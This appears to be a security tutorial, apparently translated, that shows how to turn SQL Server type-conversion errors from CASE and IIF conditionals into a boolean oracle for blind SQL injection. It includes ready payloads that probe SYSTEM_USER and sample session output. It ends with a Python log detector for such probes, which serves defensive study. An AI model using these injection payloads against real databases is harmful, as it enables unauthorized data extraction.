0x01 Introduction

When testing for injection, you may run into a situation where a parameter is injectable

but the table behind it holds no rows, so ordinary boolean-based blind injection (which relies on a row appearing or disappearing) gives you nothing to observe.

The method below gives you the same effect as the MySQL expression case when 1 like 1 then 0 else 2*1e308 end, whose else branch raises an error.

The trick is to compare two values of mismatched data types: the comparison throws a conversion error, and the presence or absence of that error forces the boolean result into view.

0x02 Test data

    1> select * from article;
    2> go
    +----+-----------+-----------+
    | id | title | content |
    +----+-----------+-----------+
    | 1 | 测试标题 | 测试内容 |
    | 2 | 测试标题2 | 测试内容2 |
    +----+-----------+-----------+
    (2 rows affected)

    # test table data: users;
    sql server> select * from users;
    +----+--------------+----------+
    | id | username | password |
    +----+--------------+----------+
    | 1 | test-user-01 | 123456 |
    | 2 | test-user-02 | 234567 |
    +----+--------------+----------+
    2 rows in set (0.00 sec)

    sql server> SELECT system_user;
    +-----------------------+
    | field1 |
    +-----------------------+
    | sa |
    +-----------------------+
    1 row in set (0.00 sec)

    sql server> select db_name();
    +-----------------------+
    | field1 |
    +-----------------------+
    | test |
    +-----------------------+
    1 row in set (0.00 sec)

0x03 CASE conditional, example 1

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END)

    # the true case
    1> select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
    2> go
    +----+----------+----------+
    | id | title | content |
    +----+----------+----------+
    | 1 | 测试标题 | 测试内容 |
    +----+----------+----------+
    (1 rows affected)

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);

    # the false case
    1> select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);
    2> go
    22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。

This gives you a forced boolean result: the query returns a row when the condition is true and raises a conversion error when it is false.

0x04 CASE conditional, example 2

SQL: select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%sa%' THEN 1 ELSE 'x' END)

    # querying SYSTEM_USER, the true case
    1> SELECT
    *
    FROM
    article
    WHERE
    id = 1
    AND 1 = (
    CASE
    WHEN SYSTEM_USER LIKE '%sa%' THEN
    1
    ELSE
    'x'
    END
    );
    2> go
    +----+----------+----------+
    | id | title | content |
    +----+----------+----------+
    | 1 | 测试标题 | 测试内容 |
    +----+----------+----------+
    (1 rows affected)

SQL: select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%aaaaa%' THEN 1 ELSE 'x' END)

    # querying SYSTEM_USER, the false case
    1> SELECT
    *
    FROM
    article
    WHERE
    id = 1
    AND 1 = (
    CASE
    WHEN SYSTEM_USER LIKE '%aaaaa%' THEN
    1
    ELSE
    'x'
    END
    );
    2> go
    22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。

0x05 IIF conditional, example 1

SQL: select * from article WHERE id=1 and 1=IIF(1=1,1,'x');

    # the true case
    1> select * from article WHERE id=1 and 1=IIF(1=1,1,'x');
    2> go
    +----+----------+----------+
    | id | title | content |
    +----+----------+----------+
    | 1 | 测试标题 | 测试内容 |
    +----+----------+----------+
    (1 rows affected)

SQL: select * from article WHERE id=1 and 1=IIF(1=2,1,'x');

    # the false case
    1> select * from article WHERE id=1 and 1=IIF(1=2,1,'x');
    2> go
    22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。

0x06 IIF conditional, example 2

    # querying SYSTEM_USER, the true case
    1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%sa%',1,'x');
    2> go
    +----+----------+----------+
    | id | title | content |
    +----+----------+----------+
    | 1 | 测试标题 | 测试内容 |
    +----+----------+----------+
    (1 rows affected)

    # querying SYSTEM_USER, the false case
    1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x');
    2> go
    22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。
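As an added example (not part of the original post), here is Python detection logic a defender could run over application logs: it flags parameter values shaped like the CASE/IIF expressions in sections 0x03 to 0x06 and correlates them with SQLSTATE 22018 conversion failures, which are the "false" half of the oracle. The log format, the client addresses and the sample lines are constructed for this example.

```python
import re
from collections import defaultdict

# CASE/IIF shapes from the examples above: a conditional whose false branch is a
# quoted string that SQL Server must convert when it is compared with an integer.
CASE_PROBE = re.compile(r"\bCASE\s+WHEN\b.+?\bELSE\s*'[^']*'\s*END\b", re.I | re.S)
IIF_PROBE = re.compile(r"\bIIF\s*\(.+?,\s*'[^']*'\s*\)", re.I | re.S)
CONVERSION_FAILED = "22018"  # SQLSTATE shown in the sessions above


def is_conditional_conversion_probe(fragment: str) -> bool:
    """True when a parameter value carries a CASE or IIF with a string-literal false branch."""
    return bool(CASE_PROBE.search(fragment) or IIF_PROBE.search(fragment))


# Hypothetical application log format, constructed for this example:
#   client=<ip> param="<raw id parameter>" sqlstate=<SQLSTATE returned by the driver>
LOG_LINE = re.compile(r'client=(?P<client>\S+) param="(?P<param>.*?)" sqlstate=(?P<state>\S+)')


def summarize(lines, threshold=2):
    """Per client, count probe-shaped parameters and 22018 failures, and flag the client
    when it sent `threshold` probes or at least one probe plus one conversion failure."""
    stats = defaultdict(lambda: {"probes": 0, "conversion_errors": 0, "flagged": False})
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        s = stats[m["client"]]
        if is_conditional_conversion_probe(m["param"]):
            s["probes"] += 1
        if m["state"] == CONVERSION_FAILED:
            s["conversion_errors"] += 1
        s["flagged"] = s["probes"] >= threshold or (s["probes"] > 0 and s["conversion_errors"] > 0)
    return dict(stats)


# Constructed sample log: one client replaying the page's requests, one ordinary user.
SAMPLE_LOG = [
    "client=10.0.0.5 param=\"1\" sqlstate=00000",
    "client=10.0.0.5 param=\"1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END)\" sqlstate=00000",
    "client=10.0.0.5 param=\"1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END)\" sqlstate=22018",
    "client=10.0.0.5 param=\"1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x')\" sqlstate=22018",
    "client=10.0.0.9 param=\"2\" sqlstate=00000",
]

if __name__ == "__main__":
    for client, s in summarize(SAMPLE_LOG).items():
        print(client, s)
```

The regexes are deliberately loose; the 22018 correlation, not the pattern match alone, is what separates a probe from a legitimate conditional expression.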